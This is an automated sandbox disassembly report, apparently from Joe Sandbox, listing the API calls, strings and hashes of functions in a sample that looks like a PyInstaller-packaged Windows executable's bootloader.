Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: b977056ebd8f976bdca1b9f7a3876c64bf4bdb26c63be015a12d340282d95314
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 1112A2A4A4EB03D1FA1DFF15B9101B8A3B0AF19751BF41835D80E527A0EF3CB95AC661

Function 00007FF7691A77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7691A7C97,?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A782C

Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736

Strings

\, xrefs: 00007FF7691A7861
%.*s, xrefs: 00007FF7691A790C
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7691A7803
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7691A78D9
CreateDirectory, xrefs: 00007FF7691A7974
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7691A796D
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7691A7840
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7691A789D

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: 3ec37d6ba19b5a3505ac5e70bc2439cd57e8d762e2278291e358dffc35c70231
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: BB419711F1D643C1FA59BF25F8516B9E271AF44790FE44433D64E82E99EE2CE904C760

Function 00007FF7691A20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7691A211B
SelectObject.GDI32 ref: 00007FF7691A2162
DrawTextW.USER32 ref: 00007FF7691A2185
SelectObject.GDI32 ref: 00007FF7691A219B
ReleaseDC.USER32 ref: 00007FF7691A21AB
MoveWindow.USER32 ref: 00007FF7691A21FB
MoveWindow.USER32 ref: 00007FF7691A223B
MoveWindow.USER32 ref: 00007FF7691A228E
MoveWindow.USER32 ref: 00007FF7691A22D6

Strings

P%, xrefs: 00007FF7691A216F

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: 76a5a1673db0565395af148334a9a4b4b0236263a3ba342845590c5ce42888af
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: 6D51E7266087A1C6D6389F26B4181BAF7B1F798B62F504121EBDF83684DF3CD045DB20

Function 00007FF7691B55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5C6C

Strings

f, xrefs: 00007FF7691B5705
-, xrefs: 00007FF7691B5679
p, xrefs: 00007FF7691B5695
p, xrefs: 00007FF7691B570D
:, xrefs: 00007FF7691B579C

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction ID: b397aba752aed9b750f1ab8a257efd6968714916559e383f963850711a6956da
Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction Fuzzy Hash: A3128162A08243C6FB68BF15F154279F673FB40754FE44136D69A866CCDB3CE9908B24

Function 00007FF7691B02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B098F

Strings

f, xrefs: 00007FF7691B0575
p, xrefs: 00007FF7691B0432
p, xrefs: 00007FF7691B03CD
f, xrefs: 00007FF7691B03C0
f, xrefs: 00007FF7691B042A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction ID: f19603c7e64af85dfceb716c266e3bccffdf2a7e8516f712b8c0d46b6fa7cf23
Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction Fuzzy Hash: EB125062E0D143C6FB28BE15B254779E6B3FB80754FE84036D699466CCDB7CE9808B60

Function 00007FF7691A1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A11D0
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A10C5
malloc, xrefs: 00007FF7691A10FC
fread, xrefs: 00007FF7691A11D7
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7691A10F5
fseek, xrefs: 00007FF7691A10CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A1097

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 535431cfb947c7d8ada28fe56dc21b0bf9e6ffde1e3e3f9903ada198aa106e64
Instruction ID: dbb8be42ad3c6ab9ee10c9e73587333f48a04fe616b30de97dba3e62b82e7663
Opcode Fuzzy Hash: 535431cfb947c7d8ada28fe56dc21b0bf9e6ffde1e3e3f9903ada198aa106e64
Instruction Fuzzy Hash: E6415121B08646C2EA28BF22B9405BAE3B1BF54BC4FE44431DD5E47F95DE3CE9058750

Function 00007FF7691A1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7691A159A
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7691A14A9
malloc, xrefs: 00007FF7691A14E0
fread, xrefs: 00007FF7691A15A1
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7691A14D9
fseek, xrefs: 00007FF7691A14B0
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7691A146F

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: c393a79db86a02c5d931fe0659ff4a9d5d057637889ec1a9a1e980c0021db4f5
Instruction ID: 3795d5a3172879acb87a804f979797337d372a63ce1e00726d208c8a7d4166f7
Opcode Fuzzy Hash: c393a79db86a02c5d931fe0659ff4a9d5d057637889ec1a9a1e980c0021db4f5
Instruction Fuzzy Hash: 7D416E21B08642C1EA28BF26B8405BAE3B0FF45BD4FE44432DE5E57E95EE3CE9418710

Function 00007FF7691ADD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7691ADD85

Part of subcall function 00007FF7691AECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF7691AED1F
Part of subcall function 00007FF7691AECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7691AED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7691ADE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7691AE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7691AE1B8

Strings

csm, xrefs: 00007FF7691ADD9F
csm, xrefs: 00007FF7691ADE06
csm, xrefs: 00007FF7691ADE80

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: 3de6a84cb46d98eb451ca9ec87a3f4b17f2614a0aad2d5357caf8b5cb3872a20
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: 01D17F32A08B41CAEB28AF65A5403BDB7B0FB54788FA04136EE4D57B95DF38E941C710

Function 00007FF7691BE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE19C
GetProcAddress.KERNEL32(?,?,?,00007FF7691BE3BA,?,?,-00000018,00007FF7691BA063,?,?,?,00007FF7691B9F5A,?,?,?,00007FF7691B524E), ref: 00007FF7691BE1A8

Strings

api-ms-, xrefs: 00007FF7691BE0E6
ext-ms-, xrefs: 00007FF7691BE0F9

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: 06273b36a89951c0c3bee4e0ab3ca8dae2d5714d0e4321fdd823760d49318c3a
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: D041A221B19A02C1EB19EF16B800675A3B6BF45BA0FB84135DD1E97788EE3CE505C7A0

Function 00007FF7691ACFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD06D
GetLastError.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD113
GetProcAddress.KERNEL32(?,?,?,00007FF7691AD29A,?,?,?,00007FF7691ACF8C,?,?,?,00007FF7691ACB89), ref: 00007FF7691AD11F

Strings

api-ms-, xrefs: 00007FF7691AD08D

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: d8f3b35796722d8ffef25c0141a0ed9c9db71d75a2e66361af65beb86ee0bc11
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 2131A325A1AA42C5EE19AF12B500579A3B4BF09BA0FB90536DD1D47B80EF3CE846C724

Function 00007FF7691BA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7691BA46F
FlsGetValue.KERNEL32 ref: 00007FF7691BA484
FlsSetValue.KERNEL32 ref: 00007FF7691BA4A5
FlsSetValue.KERNEL32 ref: 00007FF7691BA4D2
FlsSetValue.KERNEL32 ref: 00007FF7691BA4E3
FlsSetValue.KERNEL32 ref: 00007FF7691BA4F4
SetLastError.KERNEL32 ref: 00007FF7691BA50F

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction ID: ed425afdaccad30083c56d0d0ae6538f45896da75e2566c2c7e2e7f69b4c8335
Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction Fuzzy Hash: DD213820B4C242C2FA6D7F25B655139E1B35F487B0FB84634E93E46AEEDE2CA5018761

Function 00007FF7691C707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7691C70AD
GetLastError.KERNEL32 ref: 00007FF7691C70B9
CloseHandle.KERNEL32 ref: 00007FF7691C70D1
CreateFileW.KERNEL32 ref: 00007FF7691C70FC
WriteConsoleW.KERNEL32 ref: 00007FF7691C711B

Strings

CONOUT$, xrefs: 00007FF7691C70DD

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6af52981b5bd93c833f5eb161950a0489024dd7193d3ad3be74a19d3c06ac08f
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: AD118421A18A41C6E7549F12F844329E2B4FB58BE5FA00234DA1E87794DF7CE514CB50

Function 00007FF7691BA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA61D
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA64A
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA65B
FlsSetValue.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA66C
SetLastError.KERNEL32(?,?,?,00007FF7691B43FD,?,?,?,?,00007FF7691B979A,?,?,?,?,00007FF7691B649F), ref: 00007FF7691BA687

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction ID: 57b9157a358bfd0d0d490d7e3e87ab0247492faeb7a1024bb74bf51c514f99b9
Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction Fuzzy Hash: B4113860B48242C2FA5C7F25B651139E2A39F487B0FE44734D83E066EADE2CB5018721

Function 00007FF7691A2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7691A2338
DialogBoxIndirectParamW.USER32 ref: 00007FF7691A23FE
DeleteObject.GDI32 ref: 00007FF7691A2431
DestroyIcon.USER32 ref: 00007FF7691A2443

Strings

Unhandled exception in script, xrefs: 00007FF7691A2368

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction ID: 7c90c80c26d2125f04316e98079a1f0a0b782f63b25dc51a241941874907bbbd
Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction Fuzzy Hash: 34313D32A09A86C9EB28AF61F8552F9A370FF88794F940135EA4D47B59DF3CD505C710

Function 00007FF7691A2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A283B
MessageBoxA.USER32 ref: 00007FF7691A284F

Strings

Error/warning (ANSI fallback), xrefs: 00007FF7691A2843
%s%s: %s, xrefs: 00007FF7691A27EC
Error, xrefs: 00007FF7691A282C

Memory Dump Source

